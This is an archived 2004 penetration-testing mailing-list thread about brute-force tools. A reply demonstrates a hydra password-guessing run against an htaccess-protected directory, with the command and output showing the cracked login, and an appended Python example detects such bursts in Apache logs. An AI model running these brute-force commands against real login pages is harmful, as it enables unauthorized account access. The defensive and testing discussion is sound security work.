Penetration Testing mailing list archives

RE: brute force tools


From: "Robert E. Lee" <robert () dyadsecurity com>
Date: Fri, 21 May 2004 08:50:15 -0700

Don,

I have had good luck with the 4.0 version of hydra.  It's not 100%
intuitive, but it does work somewhat reliably once you get used to it.

For this demo I made a file called passlist that had 5 lines
(username:a, :aa, usename:aaa, foo:aaaa, bar:aaaaa).  I set up a
htpasswd/htaccess pair that had username username and password a.

root:/var/tmp/hydra-4.0# hydra -l username -C ./passlist \
www.domain.com http /dir -s 80
Hydra v4.0 (c) 2004 by van Hauser / THC - use allowed only for legal purposes.
Hydra (http://www.thc.org) starting at 2004-05-21 08:27:24
[DATA] 5 parallel tasks, 1 servers, 5 login tries (l:1/p:5), ~1 tries per task
[DATA] attacking service www on port 80
[STATUS] attack finished for www.domain.com
[80][www] host: 333.333.333.333   login: username   password: a
Hydra (http://www.thc.org) finished at 2004-05-21 08:27:25

With the -C option you set up a file that has the following syntax:
Username:password

I believe you may be able to get away with:
:password

I didn't see a good permuting option from the command line, but I'm sure
you could whip something up to play with your dictionary file prior to
use by hydra.

Best of luck :).

Robert

-----Original Message-----
From: don.williams () verizonwireless com
[mailto:don.williams () verizonwireless com]
Sent: Thursday, May 20, 2004 4:34 PM
To: pen-test () securityfocus com
Subject: brute force tools



Frequently I attempt to brute force web applications and have found a
few problems with the programs I have used. For instance, Brutus always
informs me of a few successful attempts, yet when I try them they fail. (2)
Webcrack is not reliable.



What I would like is some other tools you may have used with good
success and hopefully a Perl-based script which enumerates common words,
substituting letters for numbers as users do every day (i.e. pa$$w0rd).
Also, when attempting to crack ColdFusion, it only requests the password, not
the user name / password combo as most tools only allow. Windows or
Linux is fine.



Thx
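
Added example (not part of either message above, and not hydra's code): a defender-side check for the kind of run shown in the hydra output, flagging a burst of 401 responses for one path from one source in an Apache access log and reporting any authenticated 2xx from that source around the burst. The log lines, addresses, thresholds and the name find_bruteforce are constructed for illustration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample (Apache common log format); not taken from the post.
SAMPLE_LOG = """\
192.0.2.10 - usename [21/May/2004:08:27:24 -0700] "GET /dir HTTP/1.0" 401 476
192.0.2.10 - - [21/May/2004:08:27:24 -0700] "GET /dir HTTP/1.0" 401 476
192.0.2.10 - username [21/May/2004:08:27:24 -0700] "GET /dir HTTP/1.0" 200 1024
192.0.2.10 - foo [21/May/2004:08:27:25 -0700] "GET /dir HTTP/1.0" 401 476
192.0.2.10 - bar [21/May/2004:08:27:25 -0700] "GET /dir HTTP/1.0" 401 476
198.51.100.7 - - [21/May/2004:08:30:00 -0700] "GET /dir HTTP/1.1" 401 476
198.51.100.7 - alice [21/May/2004:08:30:05 -0700] "GET /dir HTTP/1.1" 200 1024
"""

LINE = re.compile(
    r'(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"\S+ (?P<path>\S+)[^"]*" (?P<status>\d{3}) ')

def find_bruteforce(log_text, min_failures=3, window=timedelta(seconds=60)):
    """Flag (source, path) pairs with >= min_failures 401s inside `window`."""
    fails, oks = defaultdict(list), defaultdict(list)
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        key = (m["ip"], m["path"])
        if m["status"] == "401":          # user field is unverified on a 401
            fails[key].append(ts)
        elif m["status"][0] == "2" and m["user"] != "-":
            oks[key].append((ts, m["user"]))
    alerts = []
    for key, stamps in fails.items():
        stamps.sort()
        best, start = 0, 0                # densest run of 401s within `window`
        for end, ts in enumerate(stamps):
            while ts - stamps[start] > window:
                start += 1
            best = max(best, end - start + 1)
        if best >= min_failures:
            # Parallel tasks mean the 2xx can land before the last 401,
            # so match successes around the burst rather than after it.
            lo, hi = stamps[0] - window, stamps[-1] + window
            users = sorted({u for t, u in oks[key] if lo <= t <= hi})
            alerts.append({"ip": key[0], "path": key[1],
                           "failures": best, "succeeded_as": users})
    return alerts
```

A single 401 followed by a 200, as from 198.51.100.7 in the sample, is the normal browser challenge and stays below the threshold.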



